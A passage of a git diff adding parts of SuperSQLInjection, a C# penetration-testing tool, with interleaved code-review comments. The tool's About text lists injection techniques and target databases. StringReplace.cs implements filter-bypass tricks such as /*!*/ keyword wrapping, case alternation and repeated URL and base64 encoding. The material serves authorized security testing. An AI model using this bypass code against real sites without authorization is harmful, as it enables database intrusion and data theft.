Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/SuperSQLInjection/ShowResponse.Designer.cs b/SuperSQLInjection/ShowResponse.Designer.cs new file mode 100644 index 0000000..eba488c --- /dev/null +++ b/SuperSQLInjection/ShowResponse.Designer.cs 
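Review bot: The three `SelectedValueChanged` handlers in Seting.cs (`cob_maxClolumnsCount_…`, `cob_oneDomainMaxSpiderCount_…`, `cob_oneDomainMaxScanCount_…`) pass the combo box `Text` straight to `int.Parse`, so empty or non-numeric text raises an unhandled `FormatException` on the UI thread, and no lower or upper bound is applied to the limits written into `main.config`. Seting.Designer.cs does not set `DropDownStyle` on these boxes, so they appear to be editable; whether free text can actually reach the handlers depends on when WinForms raises the event, but the parse should not rely on that. Each handler could take the form `int v; if (int.TryParse(this.cob_maxClolumnsCount.Text, out v) && v > 0) main.config.maxClolumns = v;`, and the designer could set `DropDownStyle = ComboBoxStyle.DropDownList` if free entry is not intended. Separately, `Seting_Shown` assigns `Checked` and `Text`, which re-enters the change handlers and writes the same values back to `main.config`, and the constructor stores `main` without a null check although every handler dereferences it; a comment on `Seting_Shown` noting the re-entry and a guard such as `if (main == null) throw new ArgumentNullException("main");` would make both explicit.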
@@ -0,0 +1,239 @@ +namespace SuperSQLInjection +{ + partial class ShowResponse + { + /// + /// Required designer variable. + /// + private System.ComponentModel.IContainer components = null; + + /// + /// Clean up any resources being used. + /// + /// true if managed resources should be disposed; otherwise, false. + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows Form Designer generated code + + /// + /// Required method for Designer support - do not modify + /// the contents of this method with the code editor. + /// + private void InitializeComponent() + { + this.tabPage3 = new System.Windows.Forms.TabPage(); + this.tab_showInBrowser = new System.Windows.Forms.TabControl(); + this.tabPage4 = new System.Windows.Forms.TabPage(); + this.txt_responseBody = new System.Windows.Forms.TextBox(); + this.tabPage5 = new System.Windows.Forms.TabPage(); + this.webBrowser1 = new System.Windows.Forms.WebBrowser(); + this.tabPage1 = new System.Windows.Forms.TabPage(); + this.txt_requestHeader = new System.Windows.Forms.TextBox(); + this.tab_requestBody = new System.Windows.Forms.TabControl(); + this.tabPage6 = new System.Windows.Forms.TabPage(); + this.txt_requestBody = new System.Windows.Forms.TextBox(); + this.tabPage2 = new System.Windows.Forms.TabPage(); + this.txt_responseHeader = new System.Windows.Forms.TextBox(); + this.tabPage3.SuspendLayout(); + this.tab_showInBrowser.SuspendLayout(); + this.tabPage4.SuspendLayout(); + this.tabPage5.SuspendLayout(); + this.tabPage1.SuspendLayout(); + this.tab_requestBody.SuspendLayout(); + this.tabPage6.SuspendLayout(); + this.tabPage2.SuspendLayout(); + this.SuspendLayout(); + // + // tabPage3 + // + this.tabPage3.Controls.Add(this.tab_showInBrowser); + this.tabPage3.Location = new System.Drawing.Point(4, 22); + this.tabPage3.Name = "tabPage3"; + this.tabPage3.Size = new System.Drawing.Size(663, 415); + 
this.tabPage3.TabIndex = 2; + this.tabPage3.Text = "Response Body"; + this.tabPage3.UseVisualStyleBackColor = true; + // + // tab_showInBrowser + // + this.tab_showInBrowser.Controls.Add(this.tabPage4); + this.tab_showInBrowser.Controls.Add(this.tabPage5); + this.tab_showInBrowser.Dock = System.Windows.Forms.DockStyle.Fill; + this.tab_showInBrowser.Location = new System.Drawing.Point(0, 0); + this.tab_showInBrowser.Name = "tab_showInBrowser"; + this.tab_showInBrowser.SelectedIndex = 0; + this.tab_showInBrowser.Size = new System.Drawing.Size(663, 415); + this.tab_showInBrowser.TabIndex = 1; + // + // tabPage4 + // + this.tabPage4.Controls.Add(this.txt_responseBody); + this.tabPage4.Location = new System.Drawing.Point(4, 22); + this.tabPage4.Name = "tabPage4"; + this.tabPage4.Padding = new System.Windows.Forms.Padding(3); + this.tabPage4.Size = new System.Drawing.Size(655, 389); + this.tabPage4.TabIndex = 0; + this.tabPage4.Text = "查看文本Text"; + this.tabPage4.UseVisualStyleBackColor = true; + // + // txt_responseBody + // + this.txt_responseBody.Dock = System.Windows.Forms.DockStyle.Fill; + this.txt_responseBody.Location = new System.Drawing.Point(3, 3); + this.txt_responseBody.MaxLength = 10000000; + this.txt_responseBody.Multiline = true; + this.txt_responseBody.Name = "txt_responseBody"; + this.txt_responseBody.ScrollBars = System.Windows.Forms.ScrollBars.Both; + this.txt_responseBody.Size = new System.Drawing.Size(649, 383); + this.txt_responseBody.TabIndex = 0; + this.txt_responseBody.KeyDown += new System.Windows.Forms.KeyEventHandler(this.txt_responseBody_KeyDown); + // + // tabPage5 + // + this.tabPage5.Controls.Add(this.webBrowser1); + this.tabPage5.Location = new System.Drawing.Point(4, 22); + this.tabPage5.Name = "tabPage5"; + this.tabPage5.Padding = new System.Windows.Forms.Padding(3); + this.tabPage5.Size = new System.Drawing.Size(655, 389); + this.tabPage5.TabIndex = 1; + this.tabPage5.Text = "在浏览器中显示"; + this.tabPage5.UseVisualStyleBackColor = true; + 
// + // webBrowser1 + // + this.webBrowser1.Dock = System.Windows.Forms.DockStyle.Fill; + this.webBrowser1.Location = new System.Drawing.Point(3, 3); + this.webBrowser1.MinimumSize = new System.Drawing.Size(20, 20); + this.webBrowser1.Name = "webBrowser1"; + this.webBrowser1.Size = new System.Drawing.Size(649, 383); + this.webBrowser1.TabIndex = 0; + // + // tabPage1 + // + this.tabPage1.Controls.Add(this.txt_requestHeader); + this.tabPage1.Location = new System.Drawing.Point(4, 22); + this.tabPage1.Name = "tabPage1"; + this.tabPage1.Padding = new System.Windows.Forms.Padding(3); + this.tabPage1.Size = new System.Drawing.Size(663, 415); + this.tabPage1.TabIndex = 0; + this.tabPage1.Text = "Request Header"; + this.tabPage1.UseVisualStyleBackColor = true; + // + // txt_requestHeader + // + this.txt_requestHeader.Dock = System.Windows.Forms.DockStyle.Fill; + this.txt_requestHeader.Location = new System.Drawing.Point(3, 3); + this.txt_requestHeader.MaxLength = 10000000; + this.txt_requestHeader.Multiline = true; + this.txt_requestHeader.Name = "txt_requestHeader"; + this.txt_requestHeader.ScrollBars = System.Windows.Forms.ScrollBars.Both; + this.txt_requestHeader.Size = new System.Drawing.Size(657, 409); + this.txt_requestHeader.TabIndex = 1; + // + // tab_requestBody + // + this.tab_requestBody.Controls.Add(this.tabPage1); + this.tab_requestBody.Controls.Add(this.tabPage6); + this.tab_requestBody.Controls.Add(this.tabPage2); + this.tab_requestBody.Controls.Add(this.tabPage3); + this.tab_requestBody.Dock = System.Windows.Forms.DockStyle.Fill; + this.tab_requestBody.Location = new System.Drawing.Point(0, 0); + this.tab_requestBody.Name = "tab_requestBody"; + this.tab_requestBody.SelectedIndex = 0; + this.tab_requestBody.Size = new System.Drawing.Size(671, 441); + this.tab_requestBody.TabIndex = 0; + // + // tabPage6 + // + this.tabPage6.Controls.Add(this.txt_requestBody); + this.tabPage6.Location = new System.Drawing.Point(4, 22); + this.tabPage6.Name = "tabPage6"; + 
this.tabPage6.Size = new System.Drawing.Size(663, 415); + this.tabPage6.TabIndex = 3; + this.tabPage6.Text = "Request Body"; + this.tabPage6.UseVisualStyleBackColor = true; + // + // txt_requestBody + // + this.txt_requestBody.Dock = System.Windows.Forms.DockStyle.Fill; + this.txt_requestBody.Location = new System.Drawing.Point(0, 0); + this.txt_requestBody.MaxLength = 10000000; + this.txt_requestBody.Multiline = true; + this.txt_requestBody.Name = "txt_requestBody"; + this.txt_requestBody.ScrollBars = System.Windows.Forms.ScrollBars.Both; + this.txt_requestBody.Size = new System.Drawing.Size(663, 415); + this.txt_requestBody.TabIndex = 1; + // + // tabPage2 + // + this.tabPage2.Controls.Add(this.txt_responseHeader); + this.tabPage2.Location = new System.Drawing.Point(4, 22); + this.tabPage2.Name = "tabPage2"; + this.tabPage2.Padding = new System.Windows.Forms.Padding(3); + this.tabPage2.Size = new System.Drawing.Size(663, 415); + this.tabPage2.TabIndex = 1; + this.tabPage2.Text = "Response Header"; + this.tabPage2.UseVisualStyleBackColor = true; + // + // txt_responseHeader + // + this.txt_responseHeader.Dock = System.Windows.Forms.DockStyle.Fill; + this.txt_responseHeader.Location = new System.Drawing.Point(3, 3); + this.txt_responseHeader.MaxLength = 10000000; + this.txt_responseHeader.Multiline = true; + this.txt_responseHeader.Name = "txt_responseHeader"; + this.txt_responseHeader.ScrollBars = System.Windows.Forms.ScrollBars.Both; + this.txt_responseHeader.Size = new System.Drawing.Size(657, 409); + this.txt_responseHeader.TabIndex = 0; + // + // ShowResponse + // + this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.ClientSize = new System.Drawing.Size(671, 441); + this.Controls.Add(this.tab_requestBody); + this.Name = "ShowResponse"; + this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; + this.Text = "请求响应"; + this.Shown += new 
System.EventHandler(this.ShowResponse_Shown); + this.tabPage3.ResumeLayout(false); + this.tab_showInBrowser.ResumeLayout(false); + this.tabPage4.ResumeLayout(false); + this.tabPage4.PerformLayout(); + this.tabPage5.ResumeLayout(false); + this.tabPage1.ResumeLayout(false); + this.tabPage1.PerformLayout(); + this.tab_requestBody.ResumeLayout(false); + this.tabPage6.ResumeLayout(false); + this.tabPage6.PerformLayout(); + this.tabPage2.ResumeLayout(false); + this.tabPage2.PerformLayout(); + this.ResumeLayout(false); + + } + + #endregion + + private System.Windows.Forms.TabPage tabPage3; + private System.Windows.Forms.TabControl tab_showInBrowser; + private System.Windows.Forms.TabPage tabPage4; + private System.Windows.Forms.TextBox txt_responseBody; + private System.Windows.Forms.TabPage tabPage5; + private System.Windows.Forms.WebBrowser webBrowser1; + private System.Windows.Forms.TabPage tabPage1; + private System.Windows.Forms.TabControl tab_requestBody; + private System.Windows.Forms.TabPage tabPage6; + private System.Windows.Forms.TabPage tabPage2; + private System.Windows.Forms.TextBox txt_responseHeader; + private System.Windows.Forms.TextBox txt_requestHeader; + private System.Windows.Forms.TextBox txt_requestBody; + + } +} \ No newline at end of file diff --git a/SuperSQLInjection/ShowResponse.cs b/SuperSQLInjection/ShowResponse.cs new file mode 100644 index 0000000..8fbd329 --- /dev/null +++ b/SuperSQLInjection/ShowResponse.cs 
@@ -0,0 +1,43 @@ +using System; +using System.Collections.Generic; +using System.ComponentModel; +using System.Data; +using System.Drawing; +using System.Text; +using System.Windows.Forms; +using model; + +namespace SuperSQLInjection +{ + public partial class ShowResponse : Form + { + public ShowResponse() + { + InitializeComponent(); + } + + public ServerInfo server = new ServerInfo(); + + private void ShowResponse_Shown(object sender, EventArgs e) + { + this.txt_requestHeader.Text = this.server.reuqestHeader; + this.txt_requestBody.Text = this.server.reuqestBody; + this.txt_responseHeader.Text = this.server.header; + this.txt_responseBody.Text = this.server.body; + + this.webBrowser1.ScriptErrorsSuppressed = true; + this.webBrowser1.DocumentText = this.server.body; + } + + private void txt_responseBody_KeyDown(object sender, KeyEventArgs e) + { + if (e.Modifiers == Keys.Control && e.KeyCode == Keys.F) + { + FindString fs = new FindString(); + fs.txtbox = this.txt_responseBody; + fs.Show(); + } + } + + } +} diff --git a/SuperSQLInjection/ShowResponse.resx b/SuperSQLInjection/ShowResponse.resx new file mode 100644 index 0000000..1af7de1 --- /dev/null +++ b/SuperSQLInjection/ShowResponse.resx @@ -0,0 +1,120 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/SuperSQLInjection/SuperSQLInjection.csproj b/SuperSQLInjection/SuperSQLInjection.csproj new file mode 100644 index 0000000..7f6138c --- /dev/null +++ b/SuperSQLInjection/SuperSQLInjection.csproj 
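Review bot: In `ShowResponse_Shown` (ShowResponse.cs), `this.webBrowser1.DocumentText = this.server.body;` hands the raw response body of the server under test to the embedded WebBrowser control as soon as the form is shown, so any markup and script that server returned is rendered on the operator's machine. `ScriptErrorsSuppressed = true` only hides script error dialogs; it does not stop script from running. I would fill the browser view only when the user opens that tab, keep the plain-text tab as the default, and mark the trust boundary with a comment such as `// server.body is untrusted remote content; render it only on explicit request`. Setting `this.webBrowser1.AllowNavigation = false;` once the document has loaded would also keep a click inside the rendered page from navigating the control elsewhere.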
@@ -0,0 +1,234 @@ + + + + Debug + x86 + 8.0.30703 + 2.0 + {6C2AE3DB-3349-4A1F-9287-9278629CD0D6} + WinExe + Properties + SuperSQLInjection + SuperSQLInjection + v4.0 + + + 512 + false + 发布\ + true + Disk + false + Foreground + 7 + Days + false + false + true + 1 + 2016.01.18.%2a + false + true + true + + + x86 + true + full + false + bin\Debug\ + DEBUG;TRACE + prompt + 4 + + + x86 + pdbonly + true + bin\Release\ + TRACE + prompt + 4 + + + false + + + 0661C2B7EEEC92022E280547613647A17F8A3715 + + + SuperSQLInjection_TemporaryKey.pfx + + + true + + + LocalIntranet + + + Properties\app.manifest + + + + + + + + + + + + + + Form + + + About.cs + + + Form + + + AddNode.cs + + + + Form + + + FindString.cs + + + Form + + + Main.cs + + + + + + + + + + + + + + + + + + + + + Form + + + ProgressBar.cs + + + + + Form + + + Seting.cs + + + Form + + + ShowResponse.cs + + + + + + + + + + + + + + + + + + + Form + + + Waring.cs + + + About.cs + + + AddNode.cs + + + FindString.cs + + + Main.cs + + + ProgressBar.cs + + + ResXFileCodeGenerator + Resources.Designer.cs + Designer + + + True + Resources.resx + True + + + Seting.cs + + + ShowResponse.cs + + + Waring.cs + + + + + SettingsSingleFileGenerator + Settings.Designer.cs + + + True + Settings.settings + True + + + + + + False + .NET Framework 3.5 SP1 Client Profile + false + + + False + .NET Framework 3.5 SP1 + true + + + + + \ No newline at end of file diff --git a/SuperSQLInjection/WARING~1.RES b/SuperSQLInjection/WARING~1.RES new file mode 100644 index 0000000..7080a7d --- /dev/null +++ b/SuperSQLInjection/WARING~1.RES 
@@ -0,0 +1,120 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/SuperSQLInjection/Waring.Designer.cs b/SuperSQLInjection/Waring.Designer.cs new file mode 100644 index 0000000..b817c57 --- /dev/null +++ b/SuperSQLInjection/Waring.Designer.cs 
@@ -0,0 +1,63 @@ +namespace SuperSQLInjection +{ + partial class Waring + { + /// + /// Required designer variable. + /// + private System.ComponentModel.IContainer components = null; + + /// + /// Clean up any resources being used. + /// + /// true if managed resources should be disposed; otherwise, false. + protected override void Dispose(bool disposing) + { + if (disposing && (components != null)) + { + components.Dispose(); + } + base.Dispose(disposing); + } + + #region Windows Form Designer generated code + + /// + /// Required method for Designer support - do not modify + /// the contents of this method with the code editor. + /// + private void InitializeComponent() + { + this.richTextBox1 = new System.Windows.Forms.RichTextBox(); + this.SuspendLayout(); + // + // richTextBox1 + // + this.richTextBox1.Dock = System.Windows.Forms.DockStyle.Fill; + this.richTextBox1.Location = new System.Drawing.Point(0, 0); + this.richTextBox1.Name = "richTextBox1"; + this.richTextBox1.Size = new System.Drawing.Size(487, 115); + this.richTextBox1.TabIndex = 0; + this.richTextBox1.Text = "本工具提供给个人、站长、企业、渗透测试工程师、Web安全工程师等信息安全人员进行信息安全检查工具,请勿利用此工具进行非授权测试,产生的法律责任与作者无关。\n作者:" + + "shack2\nQQ:1341413415\n博客:www.shack2.org"; + // + // Waring + // + this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 12F); + this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; + this.ClientSize = new System.Drawing.Size(487, 115); + this.Controls.Add(this.richTextBox1); + this.Name = "Waring"; + this.StartPosition = System.Windows.Forms.FormStartPosition.CenterScreen; + this.Text = "声 明"; + this.ResumeLayout(false); + + } + + #endregion + + private System.Windows.Forms.RichTextBox richTextBox1; + + + } +} \ No newline at end of file diff --git a/SuperSQLInjection/Waring.cs b/SuperSQLInjection/Waring.cs new file mode 100644 index 0000000..88c50f8 --- /dev/null +++ b/SuperSQLInjection/Waring.cs 
@@ -0,0 +1,18 @@ +using System; +using System.Collections.Generic; +using System.ComponentModel; +using System.Data; +using System.Drawing; +using System.Text; +using System.Windows.Forms; + +namespace SuperSQLInjection +{ + public partial class Waring : Form + { + public Waring() + { + InitializeComponent(); + } + } +} diff --git a/SuperSQLInjection/Waring.resx b/SuperSQLInjection/Waring.resx new file mode 100644 index 0000000..7080a7d --- /dev/null +++ b/SuperSQLInjection/Waring.resx @@ -0,0 +1,120 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + \ No newline at end of file diff --git a/SuperSQLInjection/about.resx b/SuperSQLInjection/about.resx new file mode 100644 index 0000000..3adea21 --- /dev/null +++ b/SuperSQLInjection/about.resx 
@@ -0,0 +1,139 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + text/microsoft-resx + + + 2.0 + + + System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 + + + 版本:超级SQL注入工具 v1.0 正式版 +说明: +超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具。 +支持自动识别SQL注入,并自动配置,如程序无法自动识别,还可人工干预识别注入,并标记注入位置。 +支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 +支持Bool型盲注、错误显示注入、Union注入。 +支持Access、MySQL5以上版本、SQLServer、Oracle等数据库。 +支持简单的SQL注入绕过,可灵活进行字符替换绕过注入防护。 +支持批量爬行扫描SQL注入或导入连接,批量探测是否可以注入。 +本工具为渗透测试人员、信息安全工程师等掌握SQL注入技能的人员设计,需要使用人员对SQL注入有一定了解。不适合新手人员使用,谢谢! +工具特点: +1.支持任意地点出现的任意SQL注入 +2.支持全自动识别注入标记,也可人工识别注入并标记。 +3.支持各种语言环境。大多数注入工具在盲注下,无法获取中文等多字节编码字符内容,本工具可完美解决。 +4.支持注入数据发包记录。让你了解程序是如何注入,有助于快速学习和找出注入问题。 +5.依靠关键字进行盲注,可通过HTTP相应状态码判断,还可以通过关键字取反功能,反过来取关键字。 +官网:www.shack2.org + + \ No newline at end of file diff --git a/SuperSQLInjection/app.config b/SuperSQLInjection/app.config new file mode 100644 index 0000000..e365603 --- /dev/null +++ b/SuperSQLInjection/app.config @@ -0,0 +1,3 @@ + + + diff --git a/SuperSQLInjection/bypass/StringReplace.cs b/SuperSQLInjection/bypass/StringReplace.cs new file mode 100644 index 0000000..7f6a8ab --- /dev/null +++ b/SuperSQLInjection/bypass/StringReplace.cs 
@@ -0,0 +1,248 @@ +using System; +using System.Collections.Generic; +using System.Text; +using SuperSQLInjection.model; +using System.Text.RegularExpressions; +using SuperSQLInjection.tools; +using System.Collections; +using tools; + +namespace SuperSQLInjection.bypass +{ + class StringReplace + { + public static String strReplaceCenter(Config config, String request, Hashtable replaceList) + { + + //找到需要处理的字符 + MatchCollection mc = Regex.Matches(request, "(?<=(\\))[.\\s\\S]*?(?=(\\))"); + String str=""; + foreach (Match m in mc) + { + str = m.Value; + + if (config.reaplaceBeforURLEncode || config.isOpenURLEncoding==false) + { + //替换字符 + str = ReplaceString(replaceList, str); + if (config.inculdeStr) + { + String split = " "; + ///*!包含分隔符*/ + String val=getValue(replaceList," "); + if (!"".Equals(val)) { + split = val; + } + str = ReplaceString(str, split); + } + if (config.isOpenURLEncoding) + { + //URL编码 + str = urlEncoding(str, config.urlencodeCount); + } + } + else { + + if (config.inculdeStr) + { + ///*!包含*/ + str = ReplaceString(str, "%20"); + } + if (config.isOpenURLEncoding) + { + //URL编码 + str = urlEncoding(str,config.urlencodeCount); + + } + //替换字符 + str = ReplaceString(replaceList, str); + } + //随机大小写 + if (config.keyReplace>0) + { + String splitstr = " "; + if (config.isOpenURLEncoding) { + splitstr = "%20"; + } + str = toLowerOrUpperCase(str, splitstr, config.keyReplace); + } + //base64处理 + if (config.base64) { + str = base64Encoding(str,config.base64Count); + } + //替换request + request = request.Replace("" + m.Value + "", str); + } + return request; + } + + public static String urlEncoding(String str,int index) + { + + for (int i = 1; i <= index; i++) + { + str=URLEncode.UrlEncode(str); + } + return str; + + } + + + public static String base64Encoding(String str,int index) { + + for (int i = 1; i <= index; i++) { + str = Convert.ToBase64String(Encoding.UTF8.GetBytes(str)); + } + return str; + + } + public static String ReplaceString(Hashtable 
repalceList,String str) { + if (repalceList != null && repalceList.Count > 0) { + try + { + IDictionaryEnumerator ite = repalceList.GetEnumerator(); + while (ite.MoveNext()) + { + String key = ite.Key.ToString(); + if (!String.IsNullOrEmpty(key)) { + str = str.Replace(key, ite.Value + ""); + } + + } + } + catch (Exception e) + { + Tools.SysLog("替换字符发生错误!----" + e.Message); + } + + } + return str; + + } + + public static String ReplaceString(String oldStr,String splitStr) + { + StringBuilder sb = new StringBuilder(); + try + { + + String[] strs = Regex.Split(oldStr, splitStr.Replace("/**/","/\\*\\*/")); + for (int i = 0; i < strs.Length; i++) { + sb.Append("/*!" + strs[i] + "*/"); + sb.Append(splitStr); + } + } + catch (Exception e) + { + Tools.SysLog("使用/*!*/包含关键字发生错误!----" + e.Message); + } + return sb.ToString().Remove(sb.Length-splitStr.Length,splitStr.Length); + + } + + public static String getValue(Hashtable table, String key) + { + try + { + IDictionaryEnumerator ite = table.GetEnumerator(); + while (ite.MoveNext()) + { + if (key.Equals(ite.Key)) { + return ite.Value+""; + } + } + } + catch (Exception e) + { + Tools.SysLog("获取对应键值对发生错误!----" + e.Message); + } + return ""; + } + + + public static String randStr(String key) { + StringBuilder sb = new StringBuilder(); + Char[] cs = new Char[key.Length]; + cs = key.ToCharArray(0, key.Length); + for (int j = 0; j < cs.Length; j++) + { + string c = cs[j] + ""; + if (j % 2 == 0) + { + c = c.ToUpper(); + } + else + { + c = c.ToLower(); + } + sb.Append(c); + } + return sb.ToString(); + } + + public static String toLowerOrUpperCase(String oldStr, String split,int changeType) + { + + StringBuilder sb = new StringBuilder(); + try + { + MatchCollection mc = Regex.Matches(oldStr, "([a-zA-Z_\\.]+"+split+ "|[a-zA-Z_\\.]+\\()"); + foreach (Match m in mc) { + + String keyStr =m.Groups[0].Value; + //库名.表不处理防止部分情况出现错误 + if (keyStr.IndexOf(".") != -1) { + continue; + } + if (changeType == 1) { + oldStr = oldStr.Replace(keyStr, 
randStr(keyStr)); + } + if (changeType == 2) + { + oldStr = oldStr.Replace(keyStr, keyStr.ToUpper()); + } + if (changeType == 3) + { + oldStr = oldStr.Replace(keyStr, keyStr.ToLower()); + } + m.NextMatch(); + + } + /* + String[] strs = Regex.Split(oldStr, split); + for (int i = 0; i < strs.Length; i++) + { + String s = strs[i]; + if (s.IndexOf(".") != -1||s.IndexOf("@") != -1||s.IndexOf("(") != -1) + { + sb.Append(s); + } + else { + Char[] cs=new Char[s.Length]; + cs = s.ToCharArray(0, s.Length); + for (int j = 0; j < cs.Length; j++) + { + string c = cs[j]+""; + if (j % 2 == 0) + { + c = c.ToUpper(); + } + else { + c = c.ToLower(); + } + sb.Append(c); + } + } + if (i+1 != strs.Length) { + sb.Append(split); + } + }*/ + } + catch (Exception e) + { + Tools.SysLog("生成随机大小写字母发生错误!----" + e.Message); + } + return oldStr.Replace("0X","0x"); + } + } +} diff --git a/SuperSQLInjection/model/Config.cs b/SuperSQLInjection/model/Config.cs new file mode 100644 index 0000000..3f7b3b9 --- /dev/null +++ b/SuperSQLInjection/model/Config.cs 
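Review bot: In `ReplaceString(String oldStr, String splitStr)` (StringReplace.cs) the final `sb.ToString().Remove(sb.Length-splitStr.Length,splitStr.Length)` sits outside the `try`. When `Regex.Split` throws, the catch only logs, `sb` is still empty, and `Remove` gets a negative start index, which raises an uncaught ArgumentOutOfRangeException. That path is reachable because `splitStr` is used as a regular-expression pattern with only `/**/` escaped by hand. A guard such as `if (sb.Length < splitStr.Length) return oldStr;` before the `Remove` keeps the failure contained. Separately, `randStr` alternates case by character index rather than randomising, so its name is misleading, and `toLowerOrUpperCase` carries an unused `StringBuilder`, an ignored `m.NextMatch()` result and a large commented-out block that can be deleted.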
@@ -0,0 +1,65 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Collections;
+
+namespace SuperSQLInjection.model
+{
+ [Serializable]
+ public class Config
+ {
+ public Config() {
+
+ }
+ public String domain = "";
+ public int port = 80;
+ public int maxTime = 10;//延时注入判断阀值
+ public InjectType injectType=new InjectType();
+ public DBType dbType = new DBType();
+ public int timeOut = 10;//秒
+ public int threadSize = 1;
+ public int reTry = 2;
+ public String encoding = "UTF-8";
+ public String request = "";
+ public String key = "";
+ public String db_encoding = "";
+ public Boolean useCode = false;
+ public int columnsCount = 0;
+ public int showColumn = 0;
+ public Boolean reverseKey = false;//反取关键字
+ public KeyType keyType = KeyType.Key;//判断类型,可以盲注以关键字或时间判断
+ public Boolean isMuStr = true;//开启多字节字符
+ public Boolean is_foward_302 = false;
+ public Boolean isOpenInfoLog=true;//开启底部日志
+ public Boolean isOpenHTTPLog = true;//开启HTTP日志
+ public Boolean isAutoCheckUpdate = true;//自动检查更新
+ public Boolean isSavaConfigWhenClose = true;//自动保存配置
+ public Boolean useSSL = false;//ssl
+ public Boolean isOpenURLEncoding = true;//开启URL编码
+ public Boolean redirectDoGet = false;//重定向使用的请求方法
+ public int maxClolumns = 50;
+ public int urlencodeCount = 1;//url编码次数
+
+ //file
+ public String readFileEncoding = "GBK";
+
+ //cmd
+ public Boolean showCmdResult = true;
+
+ //bypass
+
+ public Boolean reaplaceBeforURLEncode = true;//是否在URL编码前处理bypass字符
+ public Boolean inculdeStr = false;
+ public int keyReplace = 0;
+ public String randIPToHeader = "";
+ public int sendHTTPSleepTime = 0;
+ public String replaceStrs="";//字符替换
+ public Boolean base64 = false;//base64
+ public int base64Count = 0;
+ //scan
+ public int level = 0;
+ public int linkCount = 1;
+ public int maxSpiderCount=10;
+ public int maxScanCount = 10;
+ }
+}
diff --git a/SuperSQLInjection/model/DBType.cs b/SuperSQLInjection/model/DBType.cs
new file mode 100644
index 0000000..663061a
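Review bot: Several public fields of the `[Serializable]` class `Config` are misspelled (`reaplaceBeforURLEncode`, `inculdeStr`, `maxClolumns`, `isSavaConfigWhenClose`, `is_foward_302`). Because the type is serialized, the names will probably end up in saved configuration files and become expensive to correct later; how the config is persisted is not visible in this hunk. Renaming them now (`replaceBeforeUrlEncode`, `includeStr`, `maxColumns`, `isSaveConfigWhenClose`, `isForward302`) is cheap. `maxTime` and `timeOut` both default to 10, but only `timeOut` states its unit (`//秒`); a comment giving the unit of `maxTime` would keep the two from being confused.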
--- /dev/null
+++ b/SuperSQLInjection/model/DBType.cs
@@ -0,0 +1,17 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ [Serializable]
+ public enum DBType
+ {
+ UnKnow=0,
+ Access=1,
+ MySQL5 = 2,
+ SQLServer = 3,
+ Oracle = 4,
+ MySQL4 = 5
+ }
+}
diff --git a/SuperSQLInjection/model/DataBase.cs b/SuperSQLInjection/model/DataBase.cs
new file mode 100644
index 0000000..c2fbe51
--- /dev/null
+++ b/SuperSQLInjection/model/DataBase.cs
@@ -0,0 +1,14 @@
+using System;
+using System.Collections;
+using System.Collections.Generic;
+using System.Linq;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ [Serializable]
+ public class DataBase
+ {
+ public SerializableDictionary>> tables=new SerializableDictionary>>();
+ }
+}
diff --git a/SuperSQLInjection/model/ErrorMessage.cs b/SuperSQLInjection/model/ErrorMessage.cs
new file mode 100644
index 0000000..6314570
--- /dev/null
+++ b/SuperSQLInjection/model/ErrorMessage.cs
@@ -0,0 +1,13 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+
+namespace SuperSQLInjection.model
+{
+ public static class ErrorMessage
+ {
+ public static String mysql4_no_error_inject_info = "抱歉MySQL4数据库,不支持错误显示注入!";
+ public static String access_no_error_inject_info = "抱歉Access数据库,不支持错误显示注入!";
+ public static String access_no_key = "Access数据库需要关键字协助盲猜表明,所以大侠请你填写好关键字!";
+ }
+}
diff --git a/SuperSQLInjection/model/GetDataPam.cs b/SuperSQLInjection/model/GetDataPam.cs
new file mode 100644
index 0000000..c5f6c34
--- /dev/null
+++ b/SuperSQLInjection/model/GetDataPam.cs
@@ -0,0 +1,19 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Windows.Forms;
+
+namespace SuperSQLInjection.model
+{
+ class GetDataPam
+ {
+
+ public List columns = null;
+ public int limit = 0;
+ public String dbname = "";
+ public String table = "";
